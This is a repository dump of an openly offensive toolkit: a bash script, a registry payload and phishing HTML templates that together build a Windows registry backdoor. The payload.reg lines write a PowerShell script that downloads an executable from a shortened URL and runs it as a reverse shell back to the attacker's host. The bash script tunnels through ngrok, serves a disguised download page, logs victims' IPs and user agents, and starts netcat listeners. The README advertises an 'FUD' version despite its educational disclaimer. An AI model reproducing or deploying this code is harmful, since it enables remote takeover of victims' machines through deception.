├── Advance_Backdoor.zip
├── README.md
├── index.php
├── ip.php
├── ngrok
├── payload.reg
├── shellcode.sh
└── template.html
/Advance_Backdoor.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/M4xSec/shellcode/HEAD/Advance_Backdoor.zip
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | Follow on Social Media Platforms
3 |
4 |
5 |
6 |
7 |
8 | # ScreenShot
9 | 
10 |
11 | # Advance Backdoor
12 | For Advance_reg FUD backdoor Contact ME (for key only, Zip is already attached)
13 |
14 | # INSTALLATION [ TERMUX APP --ANDROID ]
15 | * git clone https://github.com/predator0x300/shellcode
16 | * cd shellcode/
17 | * bash shellcode.sh
18 |
19 | # INSTALLATION [ KALI ]
20 | * git clone https://github.com/predator0x300/shellcode
21 | * cd shellcode/
22 | * ./shellcode.sh
23 |
24 | # TESTED ON THE FOLLOWING:
25 | * Kali Linux - 2020.1a (version)
26 | * Parrot OS - Rolling Edition (version)
27 | * Ubuntu
28 | * Arch Linux
29 | * Termux App (beta; some of the automation will not work)
30 | # PREREQUISITES
31 | * sudo - [ MUST ]
32 |
33 | # LANGUAGE
34 | * Bash
35 |
36 |
37 | # Contact for Contributions & Issues
38 |
39 | EMAIL FOR ISSUES AND CONTRIBUTIONS: predator0x300@gmail.com
40 |
41 | # DISCLAIMER
42 | TO BE USED FOR EDUCATIONAL PURPOSES ONLY
43 |
44 | The use of the shellcode is the COMPLETE RESPONSIBILITY of the END-USER. The developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.
45 |
46 |
47 |
--------------------------------------------------------------------------------
/index.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | https://www.facebook.com/profile.php?id=100039477441223
5 |
6 |
7 |
10 |
11 |
19 |
20 |
21 | Download
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/ip.php:
--------------------------------------------------------------------------------
1 | NUL & echo ^[Net.ServicePointManager^]::SecurityProtocol ^= ^[Net.SecurityProtocolType^]::Tls12 > c:\\reg\\b.ps1 & echo (wget 'https://tinyurl.com/y88r9epk' -OutFile c:\\reg\\a.exe) >> c:\\reg\\b.ps1"
6 |
7 | "regbd2"="C:\\Windows\\System32\\cmd.exe /c powershell -ExecutionPolicy ByPass -File c:\\reg\\b.ps1 & START /MIN c:\\reg\\a.exe server_ip server_port -e cmd.exe -d & exit"
8 |
--------------------------------------------------------------------------------
/shellcode.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | trap 'printf "\n";stop' 2
4 | server_tcp="3.17.202.129"
5 |
6 | banner() {
7 |
8 |
9 | printf "\e[1;91m .---. .__ .__ .__ \e[93m .___ \e[0m \n"
10 | printf "\e[1;91m / \ -------> _____| |__ ____ | | | | \e[93m ____ ____ __| _/____ \e[0m \n"
11 | printf "\e[1;91m \.@-@./ ------> / ___/ | \_/ __ \| | | | \e[93m _/ ___\/ _ \ / __ |/ __ \ \e[0m \n"
12 | printf "\e[1;91m / \_/ \ -----> \___ \| Y \ ___/| |_| |__ \e[93m \ \__( <_> ) /_/ \ ___/ \e[0m \n"
13 | printf "\e[1;91m // _ \ \ /____ >___| /\___ >____/____/\e[93m____\___ >____/\____ |\___ >\e[0m \n"
14 | printf "\e[1;91m | \ )| \/ \/ \/ /__\e[93m___/ \/ \/ \/ \e[0m \n"
15 | printf "\e[1;91m /_ > <_/ \_ reg_backdoor \e[0m \n"
16 | printf "\e[1;91m \__/---\__/ _windows\e[0m \n"
17 | printf " \e[1;91m---------->> Coded By predator0x300 <<----------\e[0m \n"
18 | printf " \e[1;91m{Github: https://github.com/khacker1024}\e[93m\n"
19 | printf "\n"
20 |
21 |
22 |
23 | printf "\e[1;91m+----------------------------------------------+\e[0m \n"
24 | printf "\e[1;91m| Advance reg_backdoor$ |\e[0m \n"
25 | printf "\e[1;91m+----------------------------------------------+\e[0m \n"
26 | printf "\e[1;91m| For FUD REG_Backdoor along with Dropper Key |\e[0m \n"
27 | printf "\e[1;91m| Contact: predator0x300 ---------<<< |\e[0m \n"
28 | printf "\e[1;91m+----------------------------------------------+\e[0m \n"
29 |
30 |
31 | }
32 |
33 | stop() {  # SIGINT handler installed by the trap at the top of the script: signal helper processes, then exit 1
34 |
35 | checkngrok=$(ps aux | grep -o "ngrok" | head -n1)  # NOTE: the grep's own command line also contains the pattern, so this is not a strict presence test
36 | checkphp=$(ps aux | grep -o "php" | head -n1)  # same caveat as above
37 | checkssh=$(ps aux | grep -o "ssh" | head -n1)  # same caveat as above
38 | if [[ $checkngrok == *'ngrok'* ]]; then
39 | killall -2 ngrok > /dev/null 2>&1  # SIGINT; "no process found" errors are discarded
40 | fi
41 |
42 | if [[ $checkphp == *'php'* ]]; then
43 | killall -2 php > /dev/null 2>&1  # the local "php -S" server started in ngrok_server
44 | fi
45 | if [[ $checkssh == *'ssh'* ]]; then
46 | killall -2 ssh > /dev/null 2>&1  # every process named ssh is signalled, not only the one started by server()
47 | fi
48 | exit 1  # always a non-zero exit, even when nothing had to be stopped
49 |
50 | }
51 |
52 | dependencies() {  # exit 1 unless the required external tools are on PATH; messages go to stderr
53 |
54 | command -v base64 > /dev/null 2>&1 || { echo >&2 "I require base64 but it's not installed. Install it. Aborting."; exit 1; }  # base64 is used by payload()
55 | #command -v zip > /dev/null 2>&1 || { echo >&2 "I require MSFVenom but it's not installed. Install it. Aborting."; exit 1; }
56 | command -v netcat > /dev/null 2>&1 || { echo >&2 "I require netcat but it's not installed. Install it. Aborting."; exit 1; }  # NOTE: checks the name "netcat" while listener/checkfound invoke "nc"; may fail even though nc is present
57 | command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }  # "php -S" provides the local web server
58 | #command -v ssh > /dev/null 2>&1 || { echo >&2 "I require ssh but it's not installed. Install it. Aborting."; exit 1; }
59 |
60 | }
61 |
62 | direct_link() {
63 | if [[ ! -e sendlink ]]; then
64 | printf "Error!\n"
65 | exit 1
66 | else
67 |
68 | send_link=$(grep -o "https://[^ ]*." sendlink)
69 | if [[ ! -z "$send_link" ]]; then
70 |
71 | printf '\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] Direct link:\e[0m\e[1;77m %s\n' $send_link
72 | printf '\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] Obfuscation URL use bitly.com (insert above link without https)\e[0m\n'
73 |
74 | else
75 | printf "Error!"
76 | exit 1
77 | fi
78 |
79 | fi
80 |
81 | }
82 |
83 | ngrok_server() {
84 |
85 | if [[ -e ngrok ]]; then
86 | echo ""
87 | else
88 | command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
89 | command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
90 | printf "\e[1;92m[\e[0m+\e[1;92m] Downloading Ngrok...\n"
91 | arch=$(uname -a | grep -o 'arm' | head -n1)
92 | arch2=$(uname -a | grep -o 'Android' | head -n1)
93 | if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
94 | wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1
95 |
96 | if [[ -e ngrok-stable-linux-arm.zip ]]; then
97 | unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
98 | chmod +x ngrok
99 | rm -rf ngrok-stable-linux-arm.zip
100 | else
101 | printf "\e[1;93m[!] Download error... Termux, run:\e[0m\e[1;77m pkg install wget\e[0m\n"
102 | exit 1
103 | fi
104 |
105 | else
106 | wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1
107 | if [[ -e ngrok-stable-linux-386.zip ]]; then
108 | unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
109 | chmod +x ngrok
110 | rm -rf ngrok-stable-linux-386.zip
111 | else
112 | printf "\e[1;93m[!] Download error... \e[0m\n"
113 | exit 1
114 | fi
115 | fi
116 | fi
117 | printf "\e[1;91m------------------------------------\e[0m\n"
118 | printf "\e[1;92m{\e[0m+\e[1;92m} Starting php server.......\n"
119 | php -S 127.0.0.1:3333 > /dev/null 2>&1 &
120 | sleep 2
121 |
122 | if [[ -e check_ngrok ]]; then
123 | rm -rf ngrok_check
124 | fi
125 |
126 | printf "\e[1;92m{\e[0m+\e[1;92m} Starting the server.....\e[0m\n"
127 | ./ngrok tcp 4444 > /dev/null 2>&1 > check_ngrok &
128 | sleep 10
129 |
130 | check_ngrok=$(grep -o 'ERR_NGROK_302' check_ngrok)
131 |
132 | if [[ ! -z $check_ngrok ]];then
133 | printf "\n\e[91mAuthtoken missing!\e[0m\n"
134 | printf "\e[77mSign up at: https://ngrok.com/signup\e[0m\n"
135 | printf "\e[77mYour authtoken is available on your dashboard: https://dashboard.ngrok.com\n\e[0m"
136 | printf "\e[77mInstall your auhtoken:\e[0m\e[93m ./ngrok authtoken \e[0m\n\n"
137 | rm -rf check_ngrok
138 | exit 1
139 | fi
140 |
141 | link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "tcp://0.tcp.ngrok.io:[0-9]*")
142 |
143 | if [[ ! -z $link ]]; then
144 | printf "\e[1;92m[\e[0m*\e[1;92m] Forwarding from:\e[0m\e[1;77m %s\e[0m\n" $link
145 | else
146 | printf "\n\e[91m{-} Ngrok Error! :((\e[0m\n"
147 | exit 1
148 | fi
149 |
150 | }
151 |
152 | settings() {
153 |
154 | default_choose_sub="Y"
155 | default_subdomain="microsoft"
156 |
157 | printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Choose subdomain? (Default:\e[0m\e[1;77m [Y/n] \e[0m\e[1;33m): \e[0m'
158 | read choose_sub
159 | choose_sub="${choose_sub:-${default_choose_sub}}"
160 | if [[ $choose_sub == "Y" || $choose_sub == "y" || $choose_sub == "Yes" || $choose_sub == "yes" ]]; then
161 | subdomain_resp=true
162 | printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Subdomain: (Default:\e[0m\e[1;77m %s \e[0m\e[1;33m): \e[0m' $default_subdomain
163 | read subdomain
164 | subdomain="${subdomain:-${default_subdomain}}"
165 | fi
166 |
167 | }
168 |
169 | settings2() {
170 |
171 | default_payload_name="shellc"
172 | default_url="https://www.facebook.com/profile.php?id=100039477441223"
173 | #printf "\e[1;91m----------------------\e[0m\n"
174 | #printf "\e[1;91m| Configuration: |\e[0m\n"
175 | #printf "\e[1;91m| {+} RHOST IP: \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" $custom_ip
176 | #printf "\e[1;91m| {+} RHOST PORT: \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" $custom_port
177 | #printf "\e[1;91m----------------------\e[0m\n"
178 | #read -p $'\n\e[1;92m{\e[0m\e[1;77m+\e[0m\e[1;92m} SET THE ABOVE CONFIGURATION ? (1/0) \e[0m\n=>>> ' ask_configuration
179 |
180 | #if [[ $ask_configuration -eq 1 ]]; then
181 | printf '\e[1;33m{\e[0m\e[1;77m+\e[0m\e[1;33m} Win_Backdoor_Name (shellc):\e[0m\n=>>> '
182 |
183 | read payload_name
184 | payload_name="${payload_name:-${default_payload_name}}"
185 | printf "\e[1;91m----------------------------------\e[0m\n"
186 | printf "\e[1;91m| Configuration: |\e[0m\n"
187 | printf "\e[1;91m| {+} RHOST IP: \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" $custom_ip
188 | printf "\e[1;91m| {+} RHOST PORT: \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" $custom_port
189 | printf "\e[1;91m| {+} Backdoor: \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" $payload_name
190 | printf "\e[1;91m| {-} P_FORWARDING: Disabled \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n"
191 | printf "\e[1;91m----------------------------------\e[0m\n"
192 |
193 | printf '\e[1;33m{\e[0m\e[1;77m+\e[0m\e[1;33m} Redirect URL To: \e[0m\n=>>> '
194 | read url
195 | url="${url:-${default_url}}"
196 |
197 | #if [[ $ask_configuration -eq 1 ]]; then
198 | #continue
199 | #else
200 | #printf "\e[1;91m----------------------\e[0m\n"
201 | }
202 |
203 |
204 |
205 |
206 |
207 | start() {
208 |
209 | if [[ -e ip.txt ]]; then
210 | rm -f ip.txt
211 | fi
212 |
213 | printf "\n"
214 |
215 | printf "\e[1;92m{\e[0m\e[1;77m-\e[0m\e[1;92m}\e[0m\e[1;93m Target System must be rebooted! ;))\e[0m\n"
216 | #printf "\e[1;92m{\e[0m\e[1;77m+\e[0m\e[1;92m}\e[0m\e[1;93m Do You Wanna Do Port Forwarding? (y/n)\e[0m\n"
217 | printf "\e[1;91m------------------------------------\e[0m"
218 | default_option_server="0"
219 | read -p $'\n\e[1;92m{\e[0m\e[1;77m+\e[0m\e[1;92m} Do You Wanna Execute on LServer? (1/0) \e[0m\n=>>> ' option_server
220 | option_server="${option_server:-${default_option_server}}"
221 | if [[ $option_server -eq 0 ]]; then
222 |
223 | command -v php > /dev/null 2>&1 || { echo >&2 "I require ssh but it's not installed. Install it. Aborting."; exit 1; }
224 | forward=true
225 | #settings
226 | settings2
227 | ngrok_server
228 | #server
229 | payload
230 | #direct_link
231 | listener
232 | elif [[ $option_server -eq 1 ]]; then
233 | printf "\e[1;91m-----\e[0m\n"
234 | read -p $'\e[1;92m{\e[0m\e[1;77m+\e[0m\e[1;92m} HOST IP: \e[0m\n=>>> ' custom_ip
235 | if [[ -z "$custom_ip" ]]; then
236 | exit 1
237 | fi
238 | server_tcp=$custom_ip
239 | read -p $'\e[1;92m{\e[0m\e[1;77m+\e[0m\e[1;92m} TCP port (default:4444): \e[0m\n=>>> ' custom_port
240 | #printf "\e[1;91m-----\e[0m\n"
241 | if [[ -z "$custom_port" ]]; then
242 | exit 1
243 | fi
244 | server_port=$custom_port
245 | settings2
246 | payload
247 | listener
248 | else
249 | printf "\e[1;93m [!] Invalid option!\e[0m\n"
250 | sleep 1
251 | clear
252 | start
253 | fi
254 |
255 | }
256 |
257 | server() {
258 |
259 | printf "\e[1;77m[\e[0m\e[1;93m+\e[0m\e[1;77m] Starting localhost.run server...\e[0m\n"
260 |
261 | if [[ $subdomain_resp == true ]]; then
262 |
263 | ssh -T -tt -o StrictHostKeyChecking=no -R 80:localhost:3333 "$subdomain"@ssh.localhost.run > sendlink &
264 | sleep 4
265 | else
266 | $(which sh) -c 'ssh -t -t -o StrictHostKeyChecking=no -R 80:localhost:3333 ssh.localhost.run 2> /dev/null > sendlink ' &
267 | sleep 4
268 | fi
269 |
270 | }
271 |
272 | catch_ip() {
273 |
274 | ip=$(grep -a 'IP:' ip.txt | cut -d " " -f2 | tr -d '\r')
275 | IFS=$'\n'
276 | device=$(grep -o 'User-Agent:.*' ip.txt | cut -d ":" -f2)
277 | printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m %s\e[0m\n" $ip
278 | printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] User-Agent:\e[0m\e[1;77m %s\e[0m\n" $device
279 | cat ip.txt >> saved.ip.txt
280 | rm -rf ip.txt
281 | }
282 |
283 | listener() {
284 |
285 | if [[ $forward == true ]];then
286 | printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m]\e[1;91m Expose the server with command: \e[0m\n"
287 | printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m]\e[0m\e[93m ssh -R 80:localhost:3333 custom-subdomain@ssh.localhost.run \e[0m\n"
288 | #printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m]\e[0m\e[92m Send the HTTP link instead HTTPS to automatically download reg file \e[0m\n"
289 |
290 | checkfound
291 | else
292 | default_start_listener="1"
293 | printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] DO YOU WANNA START LISTENING ON PORT { %s } [1/0]? \e[0m\n=> ' $custom_port
294 | read start_listener
295 | start_listener="${start_listener:-${default_start_listener}}"
296 | if [[ $start_listener == "1" || $start_listener == "y" || $start_listener == "Yes" || $start_listener == "yes" ]]; then
297 | printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m] Listening connection:\e[0m\n"
298 | nc -lvp $custom_port
299 | else
300 | exit 1
301 | fi
302 | fi
303 | }
304 |
305 | checkfound() {
306 |
307 | printf "\n"
308 | printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Waiting targets,\e[0m\e[1;77m Press Ctrl + C to exit...\e[0m\n"
309 | while [ true ]; do
310 |
311 | if [[ -e "ip.txt" ]]; then
312 | printf "\n\e[1;92m[\e[0m+\e[1;92m] Target opened the link!\n"
313 | catch_ip
314 |
315 | default_start_listener="Y"
316 | printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Start Listener? \e[0m\e[1;77m[Y/n]\e[0m\e[1;33m: \e[0m'
317 | read start_listener
318 | start_listener="${start_listener:-${default_start_listener}}"
319 | if [[ $start_listener == "Y" || $start_listener == "y" || $start_listener == "Yes" || $start_listener == "yes" ]]; then
320 | printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m] Listening connection:\e[0m\n"
321 | nc -lvp 4444
322 |
323 | fi
324 | fi
325 | done
326 | sleep 0.5
327 |
328 | }
329 |
330 | payload() {
331 | if [[ $forward == true ]];then
332 | server_port=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "tcp://0.tcp.ngrok.io:[0-9]*" | cut -d ':' -f3)
333 | fi
334 | printf "\e[1;91m------------------------------------------------------------|Starting_Pls_Wait|-----------------------------------------------------------------------\e[0m\n"
335 | sleep 0.5
336 | printf "\e[1;91m{\e[0m\e[1;33m+\e[0m\e[1;91m}\e[0m\e[1;77m Starting the Backdoor..............//\e[0m\n"
337 | sleep 0.2
338 | printf "\e[1;77m{\e[0m\e[1;33m+\e[0m\e[1;77m} Creating reg_backdoor............//\e[0m\n"
339 | sleep 0.2
340 | sed 's+server_ip+'$server_tcp'+g' payload.reg | sed 's+server_port+'$server_port'+g' > $payload_name.reg
341 |
342 | if [[ -e $payload_name.reg ]]; then
343 |
344 | #zip $payload_name.zip $payload_name.reg > /dev/null 2>&1
345 | IFS=$'\n'
346 | #data_base64=$(base64 -w 0 $payload_name.zip)
347 | #temp64="$( echo "${data_base64}" | sed 's/[\\&*./+!]/\\&/g' )"
348 | data_base64_2=$(base64 -w 0 $payload_name.reg)
349 | temp64_2="$( echo "${data_base64_2}" | sed 's/[\\&*./+!]/\\&/g' )"
350 | sleep 0.1
351 | printf "\e[1;77m{\e[0m\e[1;33m+\e[0m\e[1;77m} Encrypting the reg with base64.........//\e[0m\n"
352 | sleep 0.2
353 | printf "\e[1;77m{\e[0m\e[1;33m+\e[0m\e[1;77m} Finishing the process!!\e[0m\n"
354 | sleep 0.3
355 | sed 's+url_website+'$url'+g' template.html | sed 's+payload_name+'$payload_name'+g' | sed 's+data_base64+'${temp64_2}'+g ' > index.php
356 | printf "\e[1;91m{\e[0m\e[1;33m+\e[0m\e[1;91m} Generated_Backdoor: {--> %s.reg <--}\e[0m\n" $payload_name
357 | printf "\e[1;91m------------------------------------------------------------|Listener_Started|-----------------------------------------------------------------------\e[0m\n"
358 | sleep 0.1
359 |
360 | else
361 | printf "\e[1;93m{-} Error! :((\e[0m\n"
362 | fi
363 |
364 | }
365 | banner
366 | dependencies
367 | start
368 |
369 |
--------------------------------------------------------------------------------
/template.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | url_website
5 |
6 |
7 |
10 |
11 |
19 |
20 |
21 | Download
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------